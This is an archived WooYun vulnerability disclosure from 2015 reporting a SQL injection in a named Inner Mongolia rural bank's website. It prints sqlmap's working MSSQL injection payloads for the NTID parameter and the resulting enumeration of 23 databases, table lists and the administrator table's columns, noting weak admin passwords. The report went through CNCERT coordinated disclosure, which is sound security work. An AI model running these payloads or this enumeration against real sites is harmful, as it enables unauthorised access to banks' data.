当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144624

漏洞标题:内蒙古某银行主站SQL注入(DBA权限&23库大量表)

相关厂商:hlbrcb.com

漏洞作者: 暴走

提交时间:2015-10-03 12:24

修复时间:2015-11-26 08:28

公开时间:2015-11-26 08:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-03: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

吃完饭,没事干,挖挖洞...

详细说明:

内蒙古呼伦贝尔农商银行主站存在GET型SQL注入一枚,导致大量数据库信息泄露。

漏洞证明:

内蒙古呼伦贝尔农商银行主站存在注入一枚,可泄露23库,几百表。
SQL注入地址:http://**.**.**.**/TextNewsList.aspx?NTID=11(注入参数NTID)
数据库SQL Server 2008

sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Place: GET
Parameter: NTID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: NTID=11 AND 9320=9320
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: NTID=11 AND 5690=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (5690=5690) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(111)+CHAR(113)))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: NTID=-4137 OR 6051=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: NTID=(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (8187=8187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(111)+CHAR(113))
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008


一共23库

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [23]:
[*] a1
[*] a2
[*] ERP
[*] ERPOA
[*] examDB
[*] ICCO
[*] KQ123
[*] lctj
[*] master
[*] model
[*] msdb
[*] MySchool
[*] MZMT
[*] NS_Web_DB
[*] ReportServer
[*] ReportServerTempDB
[*] sbgl
[*] sbgl1
[*] tempdb
[*] VCDB
[*] XHDCRM
[*] ybj0470
[*] zptest


当前数据库:NS_Web_DB

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current database: 'NS_Web_DB'


该数据库包含21表

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: NS_Web_DB
[21 tables]
+---------------+
| ApplyCompany |
| ApplyPOS |
| ApplyPersonal |
| ApplyWithdraw |
| Article |
| ArticleClass |
| Branch |
| CenterM_Roles |
| CenterM_Users |
| Class |
| Messageboard |
| Messages |
| NewsCategory |
| PicNews |
| S_Tree |
| Survey |
| SurveyOption |
| SysLog |
| TextNews |
| UserRoles |
| Users |
+---------------+


管理员表: CenterM_Users

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: NS_Web_DB
Table: CenterM_Users
[6 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| Count | int |
| ID | varchar |
| Name | varchar |
| PassWord | varchar |
| RID | int |
| Status | int |
+----------+---------+


dump下管理表看看,管理员的密码都是弱密码。

20.png


a1数据库包含129表

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: a1
[129 tables]
+-----------------------+
| AtdDayResult |
| AtdFixShiftD |
| AtdFixShiftM |
| AtdHoliday |
| AtdMonthResult |
| AtdProcRec |
| AtdRecLeave |
| AtdRecOver |
| AtdRecRest |
| AtdRecShift |
| AtdRecord |
| AtdResultSect |
| AtdResultType |
| AtdRule |
| AtdRuleList |
| AtdShift |
| AtdShiftGroup |
| AtdShiftSect |
| AtdWeekend |
| CardBalanceInfo |
| CardGrade |
| ChgAmountRecord |
| ChgConsumeSect |
| ChgRecord |
| ConsumeLog |
| CopyChgRecord |
| CopyMngAccount |
| CopyMngCardAdjust |
| CopyMngCardChange |
| CopyMngChgType |
| CopyMngEquPos |
| CopyMngMoneyChange |
| CopyMngRepair |
| CopyParam |
| CpyCopierList |
| CpyMngChgType |
| CustomProperty |
| DeviceParameter |
| DrRecord |
| DrTime |
| DrTimeList |
| EmplCustomProp |
| EquBell |
| EquBellList |
| EquCard |
| EquFinger |
| EquList |
| EquMsg |
| EquMsgText |
| EquReg |
| ErrorChgRecord |
| FPDrTime |
| FPTimeArea |
| FPTimeSect |
| FPTimeTeam |
| FixConsume |
| FixConsumeSet |
| FunParam |
| HrDept |
| HrEmployee |
| HrLeaveEmpl |
| HrTeam |
| JSDrTime |
| JSHolidayDate |
| JiTimeConsume |
| LogSize |
| MngAccount |
| MngBlackList |
| MngCardAdjust |
| MngCardChange |
| MngCardType |
| MngChgType |
| MngEquPos |
| MngMoneyChange |
| MngOrgan |
| MngRecAllowance |
| MngRepair |
| MngSquare |
| PropGroup |
| RegCardInfo |
| ShiftCurDay |
| ShiftNxtDay |
| ShiftPreDay |
| SysAllModule |
| SysBinInfo |
| SysDefDbGb |
| SysDicSubType |
| SysDicType |
| SysFavorite |
| SysFormsLang |
| SysGrid |
| SysGroupMember |
| SysGroupRight |
| SysGuide |
| SysInfo |
| SysIniIDCardNo |
| SysLog |
| SysMenuGroup |
| SysOper |
| SysOperGroup |
| SysPackage |
| SysQryConditionD |
| SysQryConditionM |
| SysRep |
| SysTmpNum |
| SysTxtSet |
| SysUseModule |
| TemplateD |
| TemplateM |
| Tmp150729150105500005 |
| Tmp150729152527373009 |
| TmpConsume |
| TmpOnDuty |
| TmpRealTime |
| TmpRecord |
| WageBankPaper |
| WageCalcMode |
| WageCalcResult |
| WageEmpItemChange |
| WageFixItemChange |
| WageFunction |
| WageItem |
| WagePersonTax |
| WagePersonnel |
| WageWorkProc |
| WageWorkProcMode |
| WorkProcAdjust |
| WorkProcRec |
| consumedetailview |
+-----------------------+


ERPOA包含100表:

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: ERPOA
[100 tables]
+--------------------+
| ERPAnPai |
| ERPBBSBanKuai |
| ERPBBSTieZi |
| ERPBaoJia |
| ERPBaoXiao |
| ERPBook |
| ERPBookJieHuan |
| ERPBuMen |
| ERPBuyChanPin |
| ERPBuyOrder |
| ERPCYDIC |
| ERPCarInfo |
| ERPCarShiYong |
| ERPCarWeiHu |
| ERPContract |
| ERPContractChanPin |
| ERPCrmSetting |
| ERPCustomFuWu |
| ERPCustomHuiFang |
| ERPCustomInfo |
| ERPCustomNeed |
| ERPDanWeiInfo |
| ERPDangAn |
| ERPDengJi |
| ERPFeiYong |
| ERPFileList |
| ERPFlowType |
| ERPForm |
| ERPFormType |
| ERPGongGao |
| ERPGuDing |
| ERPGuDingJiLu |
| ERPHuiBao |
| ERPJSDIC |
| ERPJiangCheng |
| ERPJiaoSe |
| ERPJinDu |
| ERPJuanKu |
| ERPKaoHe |
| ERPKaoHeRW |
| ERPKaoHeXM |
| ERPKaoQin |
| ERPKaoQinSetting |
| ERPKuaiDi |
| ERPLanEmail |
| ERPLiRun |
| ERPLinkLog |
| ERPLinkMan |
| ERPMeeting |
| ERPMenu |
| ERPMoBan |
| ERPMobile |
| ERPNetEmail |
| ERPOfficething |
| ERPPeiXun |
| ERPPeiXunRiJi |
| ERPPeiXunXiaoGuo |
| ERPPinShen |
| ERPProduct |
| ERPProductType |
| ERPProject |
| ERPRedHead |
| ERPRenShiHeTong |
| ERPRiChangBaoXiao |
| ERPRiZhi |
| ERPSaveFileName |
| ERPSerils |
| ERPShenPi |
| ERPShiShi |
| ERPShouKuan |
| ERPSongHuoDan |
| ERPSongYang |
| ERPSource |
| ERPSupplyLink |
| ERPSupplys |
| ERPSystemSetting |
| ERPTalkInfo |
| ERPTalkOnlineUser |
| ERPTalkSetting |
| ERPTelFile |
| ERPTongXunLu |
| ERPTouSu |
| ERPUser |
| ERPUserDesk |
| ERPVote |
| ERPWorkFlow |
| ERPWorkFlowJieDian |
| ERPWorkPlan |
| ERPWorkRiZhi |
| ERPWorkToDo |
| ERPWuLiuQingKuang |
| ERPYinZhang |
| ERPYinZhangLog |
| ERPZhiShiType |
| ERPZhiSiKu |
| S_GroupMenu |
| S_Role |
| S_RoleMenu |
| S_Times |
| dtproperties |
+--------------------+


想看那个看哪个!

修复方案:

银行系统需要更加重视安全啊。

版权声明:转载请注明来源 暴走@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-12 08:26

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给内蒙古分中心,由其后续协调网站管理单位处置.

最新状态:

暂无